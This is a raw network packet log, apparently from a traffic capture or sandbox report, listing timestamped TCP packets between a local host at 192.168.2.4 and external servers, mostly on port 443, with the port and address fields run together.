                                                                                                                                                                            Oct 28, 2024 19:12:25.404491901 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.404556990 CET49795443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.404731989 CET49795443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.404752016 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.414386034 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.414416075 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.414496899 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.414657116 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.414668083 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.856390953 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.856467009 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.856518984 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.856762886 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.856782913 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.856797934 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.856806040 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.860308886 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.860351086 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.860429049 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.860575914 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.860598087 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.975070000 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.975868940 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.975886106 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.976255894 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.976263046 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.114732981 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.114902973 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.115014076 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.115168095 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.115168095 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.115233898 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.115289927 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.118366957 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.118401051 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.118482113 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.118669987 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.118681908 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.158016920 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.158864021 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.158891916 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.159277916 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.159285069 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.176779032 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.177500010 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.177516937 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.177778959 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.177786112 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.181360960 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.181687117 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.181705952 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.182054996 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.182063103 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.302767038 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.303456068 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.303634882 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.303634882 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.303634882 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.306596994 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.306688070 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.306780100 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.307017088 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.307050943 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.319339037 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.319482088 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.319545031 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.319740057 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.319740057 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.319761038 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.319775105 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.320043087 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.320255041 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.320313931 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.320358038 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.320373058 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.321969986 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322000980 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.322165966 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322180033 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322213888 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.322259903 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322269917 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.322283030 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322463989 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322498083 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.603610992 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.603631973 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.625233889 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.625794888 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.625853062 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.626364946 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.626379013 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.774328947 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.774497986 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.774662018 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.774717093 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.774718046 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.774751902 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.774797916 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.777896881 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.777935028 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.778012991 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.778157949 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.778167009 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.061254978 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.062479973 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.062542915 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.070210934 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.070264101 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.080728054 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.081211090 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.081223965 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.081665993 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.081670046 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.085123062 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.085385084 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.085398912 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.085706949 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.085714102 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.209851027 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.209937096 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.210133076 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.210259914 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.210303068 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.210331917 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.210349083 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.213536978 CET49807443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.213596106 CET4434980713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.213696003 CET49807443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.213882923 CET49807443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.213915110 CET4434980713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.215208054 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.215374947 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.215426922 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.215467930 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.215467930 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.215486050 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.215495110 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.217319965 CET49808443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.217381954 CET4434980813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.217453957 CET49808443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.217570066 CET49808443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.217601061 CET4434980813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.224724054 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.224931955 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.224987984 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.225017071 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.225028992 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.225038052 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.225044012 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.226875067 CET49809443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.226897001 CET4434980913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.226963043 CET49809443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.227065086 CET49809443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.227087975 CET4434980913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.549211979 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.549846888 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.549896002 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.550363064 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.550376892 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.690502882 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.691042900 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.691060066 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.691523075 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.691528082 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.693344116 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.694015026 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.694103956 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.694168091 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.694168091 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.694196939 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.694221973 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.696763992 CET49810443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.696801901 CET4434981013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.696887016 CET49810443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.697007895 CET49810443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.697025061 CET4434981013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.826704979 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.826903105 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.826982975 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.886506081 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.886506081 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.886519909 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.886528015 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.930824041 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.930857897 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.930928946 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.931303978 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.931320906 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.965564013 CET4434980713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.971946001 CET49807443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.971978903 CET4434980713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.975826025 CET49807443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.975832939 CET4434980713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.982741117 CET4434980813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.983786106 CET49808443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.983845949 CET4434980813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.986217976 CET49808443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.986236095 CET4434980813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.000823975 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                            Oct 28, 2024 19:12:28.006587029 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.006669998 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                            Oct 28, 2024 19:12:28.039274931 CET4434980913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.039865017 CET49809443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.039877892 CET4434980913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.040314913 CET49809443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.040322065 CET4434980913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.108022928 CET4434980713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.108103991 CET4434980713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.108175993 CET49807443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.108398914 CET49807443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.108434916 CET4434980713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.108462095 CET49807443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.108477116 CET4434980713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.111330032 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.111371040 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.111475945 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.111608028 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.111632109 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.119637012 CET4434980813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.119822025 CET4434980813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.119894028 CET49808443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.119949102 CET49808443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.119949102 CET49808443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.119987011 CET4434980813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.120013952 CET4434980813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.121869087 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.121896982 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.121958971 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.122100115 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.122109890 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.182970047 CET4434980913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.183126926 CET4434980913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.183192968 CET49809443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.183238983 CET49809443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.183257103 CET4434980913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.183267117 CET49809443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.183271885 CET4434980913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.185993910 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.186034918 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.186126947 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.186302900 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.186319113 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.451637983 CET4434981013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.458246946 CET49810443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.458275080 CET4434981013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.459074020 CET49810443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.459081888 CET4434981013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.593945980 CET4434981013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.594039917 CET4434981013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.594094038 CET49810443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.594285965 CET49810443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.594329119 CET4434981013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.594360113 CET49810443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.594377041 CET4434981013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.597383022 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.597419024 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.597492933 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.597657919 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.597667933 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.704929113 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.705451965 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.705463886 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.705945969 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.705951929 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.983148098 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.983218908 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.983280897 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.983540058 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.983555079 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.983567953 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.983572960 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.986855984 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.986886978 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.986975908 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.987174988 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.987188101 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.110619068 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.111268044 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.111346960 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.111774921 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.111787081 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.124495983 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.124900103 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.124923944 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.125462055 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.125467062 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.128177881 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.128525972 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.128557920 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.128870010 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.128881931 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.244849920 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.244939089 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.245003939 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.245193005 CET49812443192.168.2.413.107.253.45
